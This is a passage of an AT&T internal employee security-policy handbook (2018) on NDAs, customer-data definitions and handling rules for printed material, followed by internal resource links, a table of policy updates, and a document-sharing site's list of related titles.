Persons who are not AT&T employees (e.g. Contractors, Suppliers, or Vendors) must have appropriate contractual agreements in place that
establish their relationship to the company and authorize their access to AT&T resources prior to being granted access to proprietary information
of any classification.

Content Source: ASPR-0194: Non-Disclosure Agreements (NDA)

All proprietary information provided to non-AT&T employees, either in contemplation of, or in actual performance of, work, or in connection with a
proposal to provide services or products to a customer, must be protected under the terms of a written Non-Disclosure Agreement (NDA) and/or
agreement regarding intellectual property. The NDA will specify the permissible use and further disclosure of the information.

Information Belonging or Pertaining to Customers of AT&T

Customer Data: Overview
Content Source: ASPR Glossary
Key Terms
Customer Data
Refers to the data belonging to a customer of AT&T. It includes all information handled, stored or transmitted by AT&T under contract or
terms and conditions on behalf of the customer, but excludes all customer details. It includes user generated content.
Customer Details
The data AT&T collects from a customer in connection with providing products and services to that customer. Examples include account
information (which may include Customer Proprietary Network Information (CPNI)), and technical and usage information.
Conduit
Any method of transporting, distributing or transmitting information that does not involve the intentional processing of that information.

HINTS:
 “Customer Data” is primarily the customer's own data which may transit AT&T systems or networks, but which AT&T would not normally
read, interpret or process.
 “Customer Details” includes information that AT&T would know through its relationship with the customer.

Categorization of Customer Data

Content Source: ASPR-0580
Since the content of Customer Data is not normally known by AT&T, certainly not on a per item basis, the sensitivity for all Customer Data that is
part of a defined service or service subset must be considered the same.

P a g e | 29
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
For all services or service subsets that process Customer Data (this excludes Customer Data that is transmitted within a conduit), the Service Owner
together with the Business Unit's Legal Counsel must determine whether or not the Customer Data concerned will be considered sensitive. The
determination of whether the Customer Data is "sensitive" or "not sensitive" must be documented in the service description.
Customer Data under AT&T control must not be accessible to anyone other than those explicitly authorized by the customer, or those AT&T
employees and contractors with a business need (e.g. service provisioning, problem determination and resolution).

Non-Sensitive "Customer Data" Printed Material

Content Source: ASPR-0170, ASPR-0171, ASPR-0172, ASPR-0173, ASPR-0174
NOTE: The table below covers information that has been judged as "non-sensitive" customer data as documented in the service description.
See section 5.5.3: Sensitive "Customer Data" Printed Material for handling sensitive customer data.

Activity Inside AT&T controlled space Outside AT&T controlled space

Use and storage Must be kept away from casual observers. Should never be taken outside AT&T controlled space.
If there is an overriding business need then:
Must be kept in the direct supervision of the custodian or a. Must obtain, and retain, written approval from an
physically secured (e.g. desk, filing cabinet, safe). Officer of AT&T (Level 6 or higher).
b. Must be kept away from casual observers.
c. Must be kept in the direct supervision of the custodian
or physically secured (e.g. desk, filing cabinet, safe, car
trunk/boot, hotel room safe.
d. Must not leave the direct supervision of the custodian
when traveling on public transport (e.g. taxi
trunk/boot, bus hold/baggage storage, checked
baggage on airplane).
Printing & copying Should not print or copy. Should not print or copy.

If there is an overriding business need then: If there is an overriding business need then:
 Must obtain (and retain) approval from an  Must obtain (and retain) approval from an
Executive Director (Level 4) Executive Director (Level 4)
— and — — and —
 Must supervise the printer or copier,  Must supervise the printer or copier,
— OR — — OR —
 Must print or copy in an office or area where  Must print or copy in an office or area where
access is limited to authorized personnel. access is limited to authorized personnel.

If there is an overriding business need then:

Should use double envelopes with the inner envelope
marked “Private” when using AT&T internal mail.
 Must obtain (and retain) approval from an
Executive Director (Level 4).
 Should, with the exception of individual Customer
Markings (See ASPR-1017: Labels and Marking) must not
Data sent to customers:
be visibly displayed on the envelopes. Following the
i. use double envelopes with the inner
expected delivery timeframe the sender must confirm safe
envelope marked "Private"
receipt.
— and —
ii. Be possible to track the package along its
route
— and —
iii. Be signed for upon delivery whenever
delivery is to a location external to AT&T
P a g e | 30
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
Activity Inside AT&T controlled space Outside AT&T controlled space
controlled space or whenever the delivery
utilizes non-AT&T personnel or service.

Markings (See ASPR-1017: Labels and Marking) must not

be visibly displayed on the envelopes. Following the
expected delivery timeframe the sender must confirm safe
receipt.
Fax Should not be faxed. Should not be faxed.

If there is an overriding business need then: If there is an overriding business need then:

a. Must obtain approval from an Executive Director. a. Must obtain approval from an Executive Director.
(Level 4). Approval must be retained for a period (Level 4). Approval must be retained for a period
of time consistent with RIM (see ASPR-0191: of time consistent with RIM (see ASPR-0191:
Records and Information Management (RIM). Records and Information Management (RIM).
b. Must verify receiving fax number. b. Must verify receiving fax number.
c. Should include a fax transmittal statement. c. Should include a fax transmittal statement.
d. Must only use fax machines that are supervised d. Must only use fax machines that are supervised
with authorized personnel, or are located in with authorized personnel, or are located in
offices/areas where access is limited to offices/areas where access is limited to
authorized personnel, or validated within a authorized personnel, or validated within a
business process. business process.

Where faxing to a supervised machine, upon completion Where faxing to a supervised machine, upon completion
the sender must confirm safe receipt. the sender must confirm safe receipt.
Destruction Must shred. Must shred.

Sensitive "Customer Data" Printed Material

Content Source: ASPR-0170, ASPR-0171, ASPR-0172, ASPR-0173, ASPR-0174
NOTE: The table below covers information that has been judged as “sensitive” customer data as documented in the service description.
See section Non-Sensitive "Customer Data" Printed Material for handling non-sensitive customer data.

Activity Inside AT&T controlled space Outside AT&T controlled space

Use and storage Must be kept away from casual observers. Should never be taken outside AT&T controlled space.
Must be kept in the direct supervision of the custodian or If there is an overriding business need then:
physically secured (e.g. desk, filing cabinet, safe). a. Must obtain, and retain, written approval from an
Officer of AT&T (Level 6 or higher).
b. Must be kept away from casual observers.
c. Must be kept in the direct supervision of the custodian
or physically secured (e.g. desk, filing cabinet, safe, car
trunk/boot, hotel room safe.
d. Must not leave the direct supervision of the custodian
when traveling on public transport (e.g. taxi trunk/boot,
bus hold/baggage storage, checked baggage on
airplane).
Printing & copying Should not print or copy. Should not print or copy.

P a g e | 31
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
Activity Inside AT&T controlled space Outside AT&T controlled space
 Must supervise the printer or copier,  Must supervise the printer or copier,
— OR — — OR —
 Must print or copy in an office or area where  Must print or copy in an office or area where
access is limited to authorized personnel. access is limited to authorized personnel.

Any copies of customer data created for AT&T Any copies of customer data created for AT&T
employee/contractor use must be destroyed when no employee/contractor use must be destroyed when no
longer required (see ASPR-0174: Destruction of Hard Copy longer required (see ASPR-0174: Destruction of Hard Copy
Information. Information.
Distribution Should be hand delivered by originator or custodian. Should not be distributed outside AT&T controlled space.
If hand delivery is not feasible then: If there is an overriding business need then:
i. Approval must be obtained from an Executive  Must obtain (and retain) approval from an
Director (Level 4). Executive Director (Level 4).
ii. Must use double envelopes with the inner  Should, with the exception of individual Customer
envelope marked "Private" and be possible to track Data sent to customers:
the package along its route, and be signed for upon i. Use double envelopes with the inner
delivery. envelope marked "Private"
— and —
Markings (See ASPR-1017: Labels and Marking) must not be ii. Be possible to track the package along its
visibly displayed on the envelopes. Following the expected route
delivery timeframe the sender must confirm safe receipt. — and —
iii. Be signed for upon delivery whenever
delivery is to a location external to AT&T
controlled space or whenever the delivery
utilizes non-AT&T personnel or service.

Markings (See ASPR-1017: Labels and Marking) must not be

visibly displayed on the envelopes. Following the expected
delivery timeframe the sender must confirm safe receipt.
Fax Should not be faxed. Should not be faxed.
If there is an overriding business need then: If there is an overriding business need then:

a. Must obtain approval from an Executive Director. a. Must obtain approval from an Executive Director.
(Level 4). Approval must be retained for a period (Level 4). Approval must be retained for a period
of time consistent with RIM (see ASPR-0191: of time consistent with RIM (see ASPR-0191:
Records and Information Management (RIM). Records and Information Management (RIM).
b. Must verify receiving fax number. b. Must verify receiving fax number.
c. Should include a fax transmittal statement. c. Should include a fax transmittal statement.
d. Must only use fax machines that are supervised d. Must only use fax machines that are supervised
with authorized personnel, or are located in with authorized personnel, or are located in
offices/areas where access is limited to authorized offices/areas where access is limited to authorized
personnel, or validated within a business process. personnel, or validated within a business process.

P a g e | 32
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)

Appendix A: Security Resources

Not from ASPR.
Security Request Center (Src) (https://www.e-access.att.com/src) is a one-stop website for:
 User IDs
 SecurID® tokens
 Virtual Private Network (VPN) access
 Remote Access Server (RAS) telephone access
 Mainframe access
 Intranet PIN
 Passphrase setting and re-setting.
ASPR on eGRC website (https://attegrc.cso.att.com/attegrc) contains the complete set of AT&T information security policy and standards as well
as the ASPR Glossary. Click the “AT&T Security and Policy Requirements (ASPR)” Workspace tab.
Information Classification Online Tool (http://cso.att.com/ICTool/index.htm) will assist you in determining the classification of information based
on the attributes you select.
Information Classification FAQ (http://cso.att.com/ASPR/InfoClassificationFAQ.html)
Security website (http://security.att.com/) is a portal to AT&T organizations that provide security services to the company.
Chief Security Office (CSO) website (http://cso.att.com/) is the portal for information security services provided by CSO.
CSO Awareness and Education website (http://awareness.cso.att.com/default-new.html) has security tutorials, news and a monthly security
theme.
VPN and RAS are tools for employees who work from home or from remote locations. VPN requires high speed Internet access. RAS is a dial-up link
to the AT&T internal network. Employees can get information about the VPN and RAS alternatives from this link:
http://cso.att.com/VPN/index.html. An employee can request VPN or RAS access through Src.
SecurID® is a small electronic device that is associated with a specific userid and is used to sign on to more secure areas of the company network
and to more restricted information. Employees can request a SecurID token through Src.

P a g e | 33
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date: April 23, 2018 (version 5.2)

Summary of Most Recent ASPR Updates (as of April 23, 2018)

For a markup report of the ASPR changes (before and after comparison), Click Here.

Modification
Area MR Change Classification Topic / Key Words ASPR Record
Request
1 Technology High: Significant Financial or Operational Impact Inspected Network Access Program (INAP) ASPR-0020 MR-18124863
2 Technology Moderate: Notable Business As Usual Impact Clarify which systems need to display a warning notice ASPR-0089 MR-14151045
3 Technology Moderate: Notable Business As Usual Impact Clarify Self Signed Certificate requirements ASPR-0269 MR-16439185
4 Technology Moderate: Notable Business As Usual Impact Update SSL and TLS requirements ASPR-0252 MR-16737092
Technology Moderate: Notable Business As Usual Impact Update SSL and TLS requirements 04.03 AT&T Commercial MR-16737092
5 Packet Networks: Origin of
Communications Sessions
Technology Moderate: Notable Business As Usual Impact Update SSL and TLS requirements 4.06.02 WebSphere MQ: MR-16737092
6
Midrange Security settings
Technology Low: Information or Clarification Change Hypervisor separation 2.01 Virtual Machine (VM): MR-18111393
7
Platform Virtualization
8 Technology Low: Information or Clarification Change ASPR-0020 MR-16341650
Update system inventory email
Data Low: Information or Clarification Change SPI Data Element - Background Checks ASPR-0206 MR-18453163
9

10 Process Moderate: Notable Business As Usual Impact Ensure AT&T Asset Protection are not impeded in investigations ASPR-0229 MR-16307146
11 Process Moderate: Notable Business As Usual Impact Ensure AT&T Asset Protection are not impeded in investigations ASPR-0094 MR-16307146
12 Process Moderate: Notable Business As Usual Impact Ensure AT&T Asset Protection are not impeded in investigations ASPR-0401 MR-16307146
13 Process Moderate: Notable Business As Usual Impact Ensure AT&T Asset Protection are not impeded in investigations ASPR-0576 MR-16307146
14 Process Moderate: Notable Business As Usual Impact Allow non-management employee access review and approval ASPR-0052 MR-16671957
15 Process Moderate: Notable Business As Usual Impact Allow non-management employee access review and approval ASPR-0055 MR-16671957
16 Process Moderate: Notable Business As Usual Impact Allow non-management employee access review and approval ASPR-0352 MR-16671957
17 Process Moderate: Notable Business As Usual Impact Allow non-management employee access review and approval ASPR-0312 MR-16671957
18 Process Moderate: Notable Business As Usual Impact Allow non-management employee access review and approval ASPR-0043 MR-16671957
19 Process Moderate: Notable Business As Usual Impact Allow non-management employee access review and approval ASPR-0044 MR-16671957
20 Process Moderate: Notable Business As Usual Impact Allow non-management employee access review and approval ASPR-0045 MR-16671957
21 Process Moderate: Notable Business As Usual Impact Allow non-management employee access review and approval ASPR-0046 MR-16671957

P a g e | 34
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
22 Process Moderate: Notable Business As Usual Impact Allow non-management employee access review and approval ASPR-0047 MR-16671957
23 Process Moderate: Notable Business As Usual Impact Reduce approver level for remote access requests ASPR-0472 MR-16672087
24 Process Moderate: Notable Business As Usual Impact Update "Federation" terms clarify exception ASPR-0056 MR-17777141
25 Process Moderate: Notable Business As Usual Impact Update "Federation" terms clarify exception ASPR-0558 MR-17777141
Process Moderate: Notable Business As Usual Impact Purchased Products and Application Security Requirements ASPR-0643 MR-18450809
26
(PPASR) - includes FOSS
Process Moderate: Notable Business As Usual Impact Purchased Products and Application Security Requirements ASPR-0108 MR-18450809
27
(PPASR) - includes FOSS
Process Moderate: Notable Business As Usual Impact Purchased Products and Application Security Requirements ASPR-0110 MR-18450809
28 (PPASR) - includes FOSS
Process Moderate: Notable Business As Usual Impact Purchased Products and Application Security Requirements ASPR-0431 MR-18450809
29 (PPASR) - includes FOSS
30 Process Low: Information or Clarification Change Clarify incident response actions ASPR-0233 MR-14567458
31 Process Low: Information or Clarification Change Include CSO Cyber Forensics role in security intrusions ASPR-0231 MR-15845383
32 Process Low: Information or Clarification Change Include CSO Cyber Forensics role in security intrusions ASPR-0230 MR-15845383
33 Process Low: Information or Clarification Change Include CSO Cyber Forensics role in security intrusions ASPR-0134 MR-15845383
34 Process Low: Information or Clarification Change Include CSO Cyber Forensics role in security intrusions ASPR-0239 MR-15845383
35 Process Low: Information or Clarification Change Merge Application Security baseline into Service Realization ASPR-0299 MR-6592595
36 Process Low: Information or Clarification Change Merge Application Security baseline into Service Realization ASPR-0302 MR-6592595
37 Process Low: Information or Clarification Change Merge Application Security baseline into Service Realization ASPR-0303 MR-6592595
38 Process Low: Information or Clarification Change Merge Application Security baseline into Service Realization ASPR-0304 MR-6592595
39 Process Low: Information or Clarification Change Merge Application Security baseline into Service Realization ASPR-0305 MR-6592595
40 Process Low: Information or Clarification Change Merge Application Security baseline into Service Realization ASPR-0306 MR-6592595
41 Process Low: Information or Clarification Change Merge Application Security baseline into Service Realization ASPR-0307 MR-6592595
42 Process Low: Information or Clarification Change Merge Application Security baseline into Service Realization ASPR-0308 MR-6592595
43 Process Low: Information or Clarification Change Merge Application Security baseline into Service Realization ASPR-0746 MR-6592595
44 Process Low: Information or Clarification Change Merge Application Security baseline into Service Realization ASPR-0314 MR-6592595
45 Process Low: Information or Clarification Change Merge Application Security baseline into Service Realization ASPR-0315 MR-6592595
46 Process Low: Information or Clarification Change Merge Application Security baseline into Service Realization ASPR-0316 MR-6592595
47 Process Low: Information or Clarification Change Merge Application Security baseline into Service Realization ASPR-0122 MR-6592595
48 Process Low: Information or Clarification Change Merge Application Security baseline into Service Realization ASPR-0364 MR-6592595
49 Process Low: Information or Clarification Change Merge Application Security baseline into Service Realization ASPR-0018 MR-6592595
50 Process Low: Information or Clarification Change Merge Application Security baseline into Service Realization ASPR-0009 MR-6592595

P a g e | 35
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
51 Usability Low: Information or Clarification Change Improve Security Incident linkages ASPR-0474 MR-16736856
52 Usability Low: Information or Clarification Change Improve Security Incident linkages ASPR-0227 MR-16736856
53 Usability Low: Information or Clarification Change Improve Security Incident linkages ASPR-0228 MR-16736856
54 Usability Low: Information or Clarification Change Improve Security Incident linkages ASPR-0232 MR-16736856
55 Usability Low: Information or Clarification Change Improve Security Incident linkages ASPR-0234 MR-16736856
56 Usability Low: Information or Clarification Change Improve Security Incident linkages ASPR-0235 MR-16736856
57 Usability Low: Information or Clarification Change Improve Security Incident linkages ASPR-0236 MR-16736856
58 Usability Low: Information or Clarification Change Improve Security Incident linkages ASPR-0237 MR-16736856
59 Usability Low: Information or Clarification Change Improve Security Incident linkages ASPR-0238 MR-16736856
60 Usability Low: Information or Clarification Change Improve Security Incident linkages ASPR-0142 MR-16736856
61 Usability Low: Information or Clarification Change Improve Security Incident linkages ASPR-0381 MR-16736856
Usability Low: Information or Clarification Change Improve Security Incident linkages 2.5 WLAN: Reporting MR-16736856
62 Suspicious Access Points
(APs) and Unusual Activity
63 Usability Low: Information or Clarification Change Improve Security Incident linkages 2 AS/400 Server: Policy MR-16736856
Usability Low: Information or Clarification Change Improve Security Incident linkages 1.4 z/OS Mainframe: MR-16736856
64
Incidents
65 Usability Low: Information or Clarification Change External regulations (e.g. GDPR, HIPAA, PCI, SOX) ASPR-0481 MR-16737090
66 Usability Low: Information or Clarification Change External regulations (e.g. GDPR, HIPAA, PCI, SOX) ASPR-0061 MR-16737090
67 Usability Low: Information or Clarification Change Correct AT&T Security Gateway references ASPR-0600 MR-17092637
68 Usability Low: Information or Clarification Change Correct AT&T Security Gateway references ASPR-0601 MR-17092637
69 Usability Low: Information or Clarification Change Correct AT&T Security Gateway references ASPR-0603 MR-17092637
70 Usability Low: Information or Clarification Change Correct AT&T Security Gateway references ASPR-0604 MR-17092637
71 Usability Low: Information or Clarification Change Correct AT&T Security Gateway references ASPR-0606 MR-17092637
72 Usability Low: Information or Clarification Change Correct AT&T Security Gateway references ASPR-0642 MR-17092637
73 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-0130 MR-17166430
74 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-0131 MR-17166430
75 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-0132 MR-17166430
76 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-0135 MR-17166430
77 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-0133 MR-17166430
78 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-0136 MR-17166430
79 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-0137 MR-17166430
80 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-0138 MR-17166430

P a g e | 36
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
81 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-0139 MR-17166430
82 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-0140 MR-17166430
83 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-0141 MR-17166430
84 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-0143 MR-17166430
85 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-0144 MR-17166430
86 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-0152 MR-17166430
87 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-0378 MR-17166430
88 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-0380 MR-17166430
89 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-0602 MR-17166430
90 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-0129 MR-17166430
91 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-0350 MR-17166430
92 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-0360 MR-17166430
93 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-0362 MR-17166430
94 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-0402 MR-17166430
95 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-0417 MR-17166430
96 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-0467 MR-17166430
97 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-0605 MR-17166430
98 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-0700 MR-17166430
99 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-0744 MR-17166430
100 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-0802 MR-17166430
Usability Low: Information or Clarification Change Update Security Audit Log titles 2.01.03 DB2: Review and MR-17166430
101 Retention of Audit Data
Usability Low: Information or Clarification Change Update Security Audit Log titles 4.02.01 MongoDB: Security MR-17166430
102 Logging and Auditing
Usability Low: Information or Clarification Change Update Security Audit Log titles 04.02.01 Couchbase: MR-17166430
103 Security Logging and
Auditing
Usability Low: Information or Clarification Change Update Security Audit Log titles 4.10.2 Oracle: Audit MR-17166430
104
Statements
Usability Low: Information or Clarification Change Update Security Audit Log titles 4.08.4 Oracle: MR-17166430
105
remote_login_passwordfile
Usability Low: Information or Clarification Change Update Security Audit Log titles 04.03.01 Internet of Things MR-17166430
106 (IoT): Tamper Resistance
Requirements

P a g e | 37
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
Usability Low: Information or Clarification Change Update Security Audit Log titles 04.03.03 Internet of Things MR-17166430
107 (IoT): Communications
Requirements
Usability Low: Information or Clarification Change Update Security Audit Log titles 04.03.08 Internet of Things MR-17166430
108 (IoT): Additional
Requirements
Usability Low: Information or Clarification Change Update Security Audit Log titles 02.04.07 Container MR-17166430
Virtualization: Running
109
Containers – Security Agent
and Managing Server
Usability Low: Information or Clarification Change Update Security Audit Log titles 02.01 AT&T Commercial MR-17166430
110 Packet Networks: AAA for
Network Elements
Usability Low: Information or Clarification Change Update Security Audit Log titles 2.04.01 Virtual Machine MR-17166430
111 (VM): Configure Syslog
Logging
Usability Low: Information or Clarification Change Update Security Audit Log titles 4.08 WebSphere MQ: MR-17166430
112 Security Logging and
Auditing
Usability Low: Information or Clarification Change Update Security Audit Log titles 03.05.01 Network Element MR-17166430
113
Access Security: Audit Logs
Usability Low: Information or Clarification Change Update Security Audit Log titles 2.1.8 Mac OS X: Audit MR-17166430
114
Logging
115 Usability Low: Information or Clarification Change Update Security Audit Log titles ASPR-1021 MR-17166430
116 Usability Low: Information or Clarification Change Remove reference to Data Management Policy (DMP) ASPR-0579 MR-18074215
117 Usability Low: Information or Clarification Change Cross reference two control standards and bold "must" ASPR-0017 MR-18280259
118 Usability Low: Information or Clarification Change Cross reference two control standards and bold "must" ASPR-0740 MR-18280259
119 Usability Low: Information or Clarification Change Cross reference two control standards and bold "must" ASPR-0634 MR-18280259
120 Usability Internal Tracking Only: Formatting Changes Fix broken links - Glossary Terms and Control Standards ASPR-0109 MR-18284445
121 Usability Internal Tracking Only: Formatting Changes Fix broken links - Glossary Terms and Control Standards ASPR-0111 MR-18284445
122 Usability Internal Tracking Only: Formatting Changes Fix broken links - Glossary Terms and Control Standards ASPR-0349 MR-18284445
123 Usability Internal Tracking Only: No Substantive Change Fix broken links - Glossary Terms and Control Standards ASPR-0099 MR-18284445
124 Usability Internal Tracking Only: No Substantive Change Fix broken links - Glossary Terms and Control Standards ASPR-0167 MR-18284445
125 Usability Internal Tracking Only: No Substantive Change Fix broken links - Glossary Terms and Control Standards ASPR-0175 MR-18284445
126 Usability Internal Tracking Only: No Substantive Change Fix broken links - Glossary Terms and Control Standards ASPR-0189 MR-18284445
127 Usability Internal Tracking Only: No Substantive Change Fix broken links - Glossary Terms and Control Standards ASPR-0190 MR-18284445
128 Usability Internal Tracking Only: No Substantive Change Fix broken links - Glossary Terms and Control Standards ASPR-0432 MR-18284445
129 Usability Internal Tracking Only: No Substantive Change Fix broken links - Glossary Terms and Control Standards ASPR-0465 MR-18284445
P a g e | 38
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
130 Usability Internal Tracking Only: No Substantive Change Fix broken links - Glossary Terms and Control Standards ASPR-1080 MR-18284445
131 ASPR Glossary High: Major Policy Changes Inspected Network Access Program (INAP) 4 Glossary Terms MR-18124863
132 ASPR Glossary Moderate: Notable Business As Usual Impact Clarify Self Signed Certificate requirements 2 Glossary Terms MR-16439185
133 ASPR Glossary Moderate: Notable Business As Usual Impact Update SSL and TLS requirements 1 Glossary Term MR-16737092
134 ASPR Glossary Low: Information or Clarification Change Hypervisor separation 3 Glossary Terms MR-18111393
135 ASPR Glossary Moderate: Notable Business As Usual Impact Pseudonymization, Re-Identification, etc. 13 Glossary Terms MR-18283876
ASPR Glossary Moderate: Notable Business As Usual Impact Update "Federation" terms clarify exception 4 Glossary Terms MR-17777141
136
ASPR Glossary Moderate: Notable Business As Usual Impact Purchased Products and Application Security Requirements 8 Glossary Terms MR-18450809
137 (PPASR) - includes FOSS
138 ASPR Glossary Low: Information or Clarification Change Merge Application Security baseline into Service Realization 5 Glossary Terms MR-6592595
139 ASPR Glossary Low: Information or Clarification Change Improve Security Incident linkages 2 Glossary Terms MR-16736856
140 ASPR Glossary Low: Information or Clarification Change Update "Customer Proprietary Network Information (CPNI)" 1 Glossary Term MR-17123490
141 ASPR Glossary Low: Information or Clarification Change Update "Resource" 1 Glossary Term MR-18280261
142 ASPR Glossary Internal Tracking Only: No Substantive Change Fix broken links - Glossary Terms and Control Standards 11 Glossary Terms MR-18284445

P a g e | 39
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement

The Business Upper-Intermediate Answer Key
100% (2)
The Business Upper-Intermediate Answer Key
20 pages
(Ebook) Computers are your future. Complete by LaBerta, Catherine ISBN 9780131391604, 9781292021058, 9785655996311, 0131391607, 1292021055, 5655996316 all chapter instant download
No ratings yet
(Ebook) Computers are your future. Complete by LaBerta, Catherine ISBN 9780131391604, 9781292021058, 9785655996311, 0131391607, 1292021055, 5655996316 all chapter instant download
82 pages
Computer Care AMC Format
53% (17)
Computer Care AMC Format
5 pages
WCAdapterGuide PDF
No ratings yet
WCAdapterGuide PDF
211 pages
Tga Medical Device Cyber Security Guidance Industry.1.1pdf
No ratings yet
Tga Medical Device Cyber Security Guidance Industry.1.1pdf
55 pages
Download
No ratings yet
Download
38 pages
Functional Spec-ID-26 Trail Balance Report
No ratings yet
Functional Spec-ID-26 Trail Balance Report
8 pages
Primepower Functional Safety Manual: March 2018, Revision 1.5
No ratings yet
Primepower Functional Safety Manual: March 2018, Revision 1.5
29 pages
Newcomers To AS2 Implementation Guide I1
No ratings yet
Newcomers To AS2 Implementation Guide I1
14 pages
1.1 License Master Data Maintenance-Define License Class
No ratings yet
1.1 License Master Data Maintenance-Define License Class
21 pages
IT Baseline Protection Manual PDF
No ratings yet
IT Baseline Protection Manual PDF
1,680 pages
Especificaciones Tecnicas de Tuberia
No ratings yet
Especificaciones Tecnicas de Tuberia
200 pages
PPP (Program Protection Plan) - Outline-and-Guidance-v1-July2011
No ratings yet
PPP (Program Protection Plan) - Outline-and-Guidance-v1-July2011
33 pages
s71500 Pid Control Function Manual EnUS en-US
No ratings yet
s71500 Pid Control Function Manual EnUS en-US
570 pages
GP TechnicalNoteCryptoAlgorithmRecs v2.0 PublicRelease
No ratings yet
GP TechnicalNoteCryptoAlgorithmRecs v2.0 PublicRelease
12 pages
ST Programming PDF
No ratings yet
ST Programming PDF
446 pages
Basic TechnologyFct
No ratings yet
Basic TechnologyFct
736 pages
SolidWorks-Mathcad Prime Integration User Guide
100% (1)
SolidWorks-Mathcad Prime Integration User Guide
17 pages
Isod Inst PDF
No ratings yet
Isod Inst PDF
41 pages
ISO27k Guideline On ISMS Implementation and Metrics 1v3
No ratings yet
ISO27k Guideline On ISMS Implementation and Metrics 1v3
15 pages
Mathcad Prime Whats New en-US
No ratings yet
Mathcad Prime Whats New en-US
12 pages
009 - s7 - Energy - Suite - Function - Manual - en-US - en-US
No ratings yet
009 - s7 - Energy - Suite - Function - Manual - en-US - en-US
189 pages
Draft TIC 3.0 Vol. 5 Service Provider Overlay Handbook
No ratings yet
Draft TIC 3.0 Vol. 5 Service Provider Overlay Handbook
10 pages
Controls Instrumentation Detail Engineering
100% (4)
Controls Instrumentation Detail Engineering
24 pages
Bill Analysis Within Premier Ebill 081513
No ratings yet
Bill Analysis Within Premier Ebill 081513
29 pages
190201 final_core_iot_cybersecurity_capabilities_baseline_considerations
No ratings yet
190201 final_core_iot_cybersecurity_capabilities_baseline_considerations
9 pages
Cyb Sec Guideline V02 01 en
No ratings yet
Cyb Sec Guideline V02 01 en
47 pages
Draft TIC 3.0 Vol. 3 Security Capabilities Handbook
No ratings yet
Draft TIC 3.0 Vol. 3 Security Capabilities Handbook
18 pages
Product Requirements Document: Ingenit
No ratings yet
Product Requirements Document: Ingenit
13 pages
SYH Opc 76 PDF
No ratings yet
SYH Opc 76 PDF
154 pages
Report 20102016 Manual
No ratings yet
Report 20102016 Manual
31 pages
Maintenance Program Development For New Assets Services
No ratings yet
Maintenance Program Development For New Assets Services
8 pages
addUPI 1.2.2
No ratings yet
addUPI 1.2.2
57 pages
IDT R30xx Family Software Reference Manual: Revision 1.0
No ratings yet
IDT R30xx Family Software Reference Manual: Revision 1.0
354 pages
BH US 12 Weber Eye of The Meter WP
No ratings yet
BH US 12 Weber Eye of The Meter WP
12 pages
ITRMPSG Brief Supportdocs
No ratings yet
ITRMPSG Brief Supportdocs
15 pages
CP R80.10 IPS BestPractices Guide
No ratings yet
CP R80.10 IPS BestPractices Guide
18 pages
BA_CP-1628_76_en-US
No ratings yet
BA_CP-1628_76_en-US
24 pages
Ot Security Insights Secure Ot It Convergence to Keep the Production Lines Working
No ratings yet
Ot Security Insights Secure Ot It Convergence to Keep the Production Lines Working
20 pages
s71500 Pid Control Function Manual EnUS en-US
No ratings yet
s71500 Pid Control Function Manual EnUS en-US
523 pages
ATR OIM 2022_014 Issue 1 Dt.28.11.2022
No ratings yet
